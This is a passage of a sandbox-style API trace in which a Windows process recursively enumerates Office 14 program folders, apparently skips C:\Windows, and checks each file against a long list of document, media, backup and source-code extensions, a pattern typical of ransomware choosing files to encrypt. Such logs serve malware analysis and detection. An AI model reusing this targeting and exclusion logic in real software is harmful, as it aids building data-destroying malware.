ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64de54f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathOMFormServices", cAlternateFileName="INFOPA~2")) returned 1 [0043.094] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x545acaf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64de54f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64de54f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed12c0 [0043.096] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x545acaf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64de54f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64de54f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.097] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x553a8c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64de54f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64de54f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathOMFormServicesV12", cAlternateFileName="INFOPA~1")) returned 1 [0043.097] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\*", lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x553a8c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64de54f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64de54f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0043.097] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x553a8c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64de54f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64de54f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.097] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ae85c00, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x553a8c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5ae85c00, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xa770, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.Infopath.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0043.098] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0043.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f02080 | out: hHeap=0x5f0000) returned 1 [0043.105] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ae85c00, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x64de54f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5ae85c00, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xb770, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.Infopath.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0043.105] FindClose (in: hFindFile=0x3ed12c0 | out: hFindFile=0x3ed12c0) returned 1 [0043.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fba0b0 | out: hHeap=0x5f0000) returned 1 [0043.105] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x544ee410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64dbf390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64dbf390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathOMV12", cAlternateFileName="INFOPA~1")) returned 1 [0043.106] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x544ee410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64dbf390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64dbf390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed12c0 [0043.106] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x544ee410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64dbf390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64dbf390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.106] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c198900, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x544ee410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5c198900, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xd770, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.Infopath.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0043.106] FindClose (in: hFindFile=0x3ed12c0 | out: hFindFile=0x3ed12c0) returned 1 [0043.106] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fba0b0 | out: hHeap=0x5f0000) returned 1 [0043.106] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c198900, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x64dbf390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5c198900, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xe770, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.Infopath.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0043.106] FindClose (in: hFindFile=0x3ed1480 | out: hFindFile=0x3ed1480) returned 1 [0043.106] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3faa0a8 | out: hHeap=0x5f0000) returned 1 [0043.106] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553f4600, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x61d191f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553f4600, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0x7bb78, dwReserved0=0x0, dwReserved1=0x0, cFileName="INLAUNCH.DLL", cAlternateFileName="")) returned 1 [0043.107] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x51fe2db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x51fe2db0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1480 [0043.107] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x51fe2db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x51fe2db0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.107] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Analysis", cAlternateFileName="")) returned 1 [0043.108] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1440 [0043.109] FindNextFileW (in: hFindFile=0x3ed1440, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.109] FindNextFileW (in: hFindFile=0x3ed1440, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1ecf00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a1ecf00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x3bb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ANALYS32.XLL", cAlternateFileName="")) returned 1 [0043.109] FindClose (in: hFindFile=0x3ed1440 | out: hFindFile=0x3ed1440) returned 1 [0043.110] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fba0b0 | out: hHeap=0x5f0000) returned 1 [0043.110] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x51fe2db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x62688, dwReserved0=0x0, dwReserved1=0x0, cFileName="EUROTOOL.XLAM", cAlternateFileName="EUROTO~1.XLA")) returned 1 [0043.110] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa671530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1440 [0043.110] FindNextFileW (in: hFindFile=0x3ed1440, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa671530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.110] FindNextFileW (in: hFindFile=0x3ed1440, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x6c340, dwReserved0=0x0, dwReserved1=0x0, cFileName="SOLVER.XLAM", cAlternateFileName="SOLVER~1.XLA")) returned 1 [0043.111] FindClose (in: hFindFile=0x3ed1440 | out: hFindFile=0x3ed1440) returned 1 [0043.111] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fba0b0 | out: hHeap=0x5f0000) returned 1 [0043.111] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa671530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SOLVER", cAlternateFileName="")) returned 0 [0043.111] FindClose (in: hFindFile=0x3ed1480 | out: hFindFile=0x3ed1480) returned 1 [0043.111] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3faa0a8 | out: hHeap=0x5f0000) returned 1 [0043.111] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11ca6e00, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd5dfae80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x11ca6e00, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0xfafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOGELEMS.DLL", cAlternateFileName="")) returned 1 [0043.118] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x708e7550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x708e7550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1400 [0043.120] FindNextFileW (in: hFindFile=0x3ed1400, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x708e7550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x708e7550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.120] FindNextFileW (in: hFindFile=0x3ed1400, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb796bf00, ftCreationTime.dwHighDateTime=0x1bd8ab7, ftLastAccessTime.dwLowDateTime=0x5ebdaad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb796bf00, ftLastWriteTime.dwHighDateTime=0x1bd8ab7, nFileSizeHigh=0x0, nFileSizeLow=0x6daa, dwReserved0=0x0, dwReserved1=0x0, cFileName="APPLAUSE.WAV", cAlternateFileName="")) returned 1 [0043.121] FindClose (in: hFindFile=0x3ed1400 | out: hFindFile=0x3ed1400) returned 1 [0043.122] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0043.122] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4f5000, ftCreationTime.dwHighDateTime=0x1cac037, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d4f5000, ftLastWriteTime.dwHighDateTime=0x1cac037, nFileSizeHigh=0x0, nFileSizeLow=0x1c798, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BusinessData.dll", cAlternateFileName="MI5659~1.DLL")) returned 1 [0043.692] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5481df0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6f6b5a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa6f6b5a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.692] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97285f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x97285f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x97285f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0043.692] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033") returned 1 [0043.692] lstrcmpiW (lpString1="C:\\Windows", lpString2="1033") returned 1 [0043.692] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3f52098 [0043.692] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97285f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x97285f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x97285f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed13c0 [0043.693] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97285f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x97285f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x97285f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.693] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdcf7a00, ftCreationTime.dwHighDateTime=0x1ca60f4, ftLastAccessTime.dwLowDateTime=0x97748b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfdcf7a00, ftLastWriteTime.dwHighDateTime=0x1ca60f4, nFileSizeHigh=0x0, nFileSizeLow=0x517800, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSGR3EN.DLL", cAlternateFileName="")) returned 1 [0043.693] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0043.693] lstrcmpiW (lpString1=".3ds", lpString2=".DLL") returned -1 [0043.693] lstrcmpiW (lpString1=".3fr", lpString2=".DLL") returned -1 [0043.693] lstrcmpiW (lpString1=".3g2", lpString2=".DLL") returned -1 [0043.693] lstrcmpiW (lpString1=".3gp", lpString2=".DLL") returned -1 [0043.693] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0043.693] lstrcmpiW (lpString1=".accda", lpString2="EN.DLL") returned -1 [0043.693] lstrcmpiW (lpString1=".accdb", lpString2="EN.DLL") returned -1 [0043.693] lstrcmpiW (lpString1=".accdc", lpString2="EN.DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".accde", lpString2="EN.DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".accdt", lpString2="EN.DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".accdw", lpString2="EN.DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".adb", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".adp", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".ai", lpString2="DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".ai3", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".ai4", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".ai5", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".ai6", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".ai7", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".ai8", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".anim", lpString2="N.DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".arw", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".as", lpString2="DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".asa", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".asc", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".ascx", lpString2="N.DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".asm", lpString2=".DLL") returned -1 [0043.694] lstrcmpiW (lpString1=".asmx", lpString2="N.DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".asp", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".aspx", lpString2="N.DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".asr", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".asx", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".avi", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".avs", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".backup", lpString2="3EN.DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".bak", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".bay", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".bd", lpString2="DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".bmp", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".c", lpString2="LL") returned -1 [0043.695] lstrcmpiW (lpString1=".cdr", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".cer", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".cf", lpString2="DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".cfc", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".cfm", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".cfml", lpString2="N.DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".cfu", lpString2=".DLL") returned -1 [0043.695] lstrcmpiW (lpString1=".chm", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".cin", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".class", lpString2="EN.DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".clx", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".config", lpString2="3EN.DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".cpp", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".cr2", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".crt", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".crw", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".cs", lpString2="DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".css", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".csv", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".cub", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW (lpString1=".dae", lpString2=".DLL") returned -1 [0043.696] lstrcmpiW 